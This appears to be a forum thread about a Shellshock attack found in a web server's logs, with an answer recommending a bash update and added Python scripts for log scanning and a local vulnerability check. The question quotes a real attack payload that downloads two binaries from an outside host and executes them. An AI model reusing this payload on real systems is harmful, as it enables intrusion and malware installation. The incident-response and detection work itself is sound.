
We discovered the binaries /tmp/susu1 and /tmp/susu2, executed by the webserver user.

In the logs we have the following entries:

[24/Sep/2015:06:09:34 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 301 0 "() { :;} ;
  echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";
  ''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''
  $g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''
  if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''
  $g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''
  $h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"

But we found only the error codes 301, 302, 403, 404, 500 for such requests. No 200 code, which would indicate that the hack was successful.

Is this a common security problem? How can it be fixed? Or how can it be further tracked down?

Alex
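To track such requests down across a whole log rather than by eye, here is an added example (not code from the question or the answer) that parses combined-format access-log lines, flags the ones carrying the Shellshock function-definition prefix "() {" in the request line, Referer or User-Agent, records the targeted CGI path and grades the HTTP status: 200 means the CGI script ran and answered, 500 is ambiguous (the script may have run but emitted no valid CGI header, which Apache reports as a server error), and 301/302/403/404 mean the request was redirected or refused before any script was invoked. The sample log lines are constructed; the first mirrors the entry in the question with the download host replaced by a placeholder.

```python
"""Scan web-server access-log lines for Shellshock probes and grade each hit.

Added example for this thread; not code from the question or the answer.
The sample log lines below are constructed and attacker.example is a placeholder.
"""
import re
from collections import Counter

# Apache/nginx combined log format. The leading "host ident user" triple is
# optional so that lines trimmed like the one in the question still parse.
LOG_RE = re.compile(
    r'^(?:(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) )?'
    r'\[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)")?'
)

# Shellshock trigger: empty parameter list followed by an opening brace,
# with any whitespace in between ("() {", "(){", "( ) {").
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not a log entry."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(status):
    """Grade the status code of a request that carried a Shellshock payload."""
    if status == 200:
        return "executed"      # CGI script ran and produced a valid response
    if status == 500:
        return "ambiguous"     # script may have run but sent malformed CGI headers
    return "not reached"       # redirected, forbidden or missing: no script ran


def find_shellshock(lines):
    """One record per line whose request, Referer or User-Agent holds the trigger."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        fields = [f for f in ("request", "referer", "agent")
                  if rec.get(f) and SHELLSHOCK_RE.search(rec[f])]
        if not fields:
            continue
        parts = rec["request"].split()
        status = int(rec["status"])
        hits.append({
            "time": rec["time"],
            "path": parts[1] if len(parts) > 1 else rec["request"],
            "status": status,
            "fields": fields,
            "verdict": classify(status),
        })
    return hits


def summarize(hits):
    """Aggregate hits by status and targeted path; list paths that (may have) run."""
    return {
        "total": len(hits),
        "by_status": dict(Counter(h["status"] for h in hits)),
        "targets": dict(Counter(h["path"] for h in hits)),
        "executed": [h["path"] for h in hits if h["verdict"] == "executed"],
        "ambiguous": [h["path"] for h in hits if h["verdict"] == "ambiguous"],
    }


# Constructed sample lines. The first mirrors the question's entry (payload in
# the Referer, answered with a 301 before the CGI ran); the others are made up.
SAMPLE_LOG = [
    r'''203.0.113.5 - - [24/Sep/2015:06:09:34 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 301 0 "() { :;} ; echo;/usr/local/bin/php -r '$a = \"http://attacker.example/s/susu1\";'" "-"''',
    r'''203.0.113.5 - - [24/Sep/2015:06:09:35 +0200] "GET /cgi-bin/test.cgi HTTP/1.0" 404 231 "-" "() { :;}; echo vulnerable"''',
    r'''198.51.100.7 - - [24/Sep/2015:06:10:02 +0200] "GET /cgi-bin/status.sh HTTP/1.1" 200 89 "-" "() { :;}; echo; echo hit"''',
    r'''198.51.100.7 - - [24/Sep/2015:06:10:03 +0200] "GET /cgi-bin/status.sh HTTP/1.1" 500 612 "-" "() { :;}; echo hit"''',
    r'''192.0.2.9 - - [24/Sep/2015:06:11:00 +0200] "GET /index.html HTTP/1.1" 200 1042 "-" "Mozilla/5.0"''',
]

if __name__ == "__main__":
    found = find_shellshock(SAMPLE_LOG)
    for h in found:
        print(f'{h["time"]}  {h["status"]}  {h["path"]:30} in {",".join(h["fields"])}  -> {h["verdict"]}')
    print(summarize(found))
```

To run it over a real log, pass the open file instead of SAMPLE_LOG (the log path depends on the distribution; /var/log/apache2/access.log is one common location). Treat the 500 entries with the same care as 200s: compare their timestamps with the creation times of /tmp/susu1 and /tmp/susu2 and with the CGI error log, since a script that runs the injected commands but never prints a proper CGI header is logged as a 500, not a 200.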

1 Answer


This seems to be a Shellshock attack; it was announced for the first time on 24 September 2014, when Bash released the fix for this bug.

From Wikipedia about Shellshock:

The first bug causes Bash to unintentionally execute commands when the commands are concatenated to the end of function definitions stored in the values of environment variables. Within days of the publication of this, intense scrutiny of the underlying design flaws discovered a variety of related vulnerabilities (CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, and CVE-2014-7187), which Ramey addressed with a series of further patches.

You can check if your system is vulnerable as explained in How to test if my server is vulnerable to the ShellShock bug?

You have to update your system or at least your Bash version to fix the problem.
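The check the answer refers to can be scripted. This is an added example, not code from the answer or from the linked question: it starts bash with an exported variable holding a function definition followed by an extra command. An unpatched bash (CVE-2014-6271) imports the function and also runs the trailing command, so the marker appears in the output; a patched bash treats the variable as plain text and only the -c script's own output appears.

```python
"""Local Shellshock (CVE-2014-6271) self-check for the installed bash.

Added example for this thread; not code from the answer or the linked question.
"""
import shutil
import subprocess

# Printed only if bash executes the command appended to the function definition.
MARKER = "SHELLSHOCK_MARKER"


def shellshock_status(bash="bash"):
    """Return 'vulnerable', 'patched', 'inconclusive' or 'bash not found'."""
    path = shutil.which(bash)
    if path is None:
        return "bash not found"
    # A minimal environment: the probe variable is the only thing bash imports.
    env = {"PATH": "/usr/bin:/bin", "probe": "() { :;}; echo " + MARKER}
    try:
        proc = subprocess.run([path, "-c", "echo probe-finished"],
                              env=env, capture_output=True, text=True, timeout=10)
    except (OSError, subprocess.TimeoutExpired):
        return "inconclusive"
    if MARKER in proc.stdout or MARKER in proc.stderr:
        return "vulnerable"       # trailing command ran before the -c script
    if "probe-finished" in proc.stdout:
        return "patched"          # variable was imported as plain text only
    return "inconclusive"


if __name__ == "__main__":
    print("bash:", shutil.which("bash"), "->", shellshock_status())
```

The check only exercises the bash binary found on PATH (pass another path as the argument to test, for example, a chrooted copy). It says nothing about whether the web server actually hands requests to bash, so after updating bash as the answer says, also confirm which interpreter the CGI scripts in /cgi-sys and /cgi-bin use and whether /bin/sh links to bash.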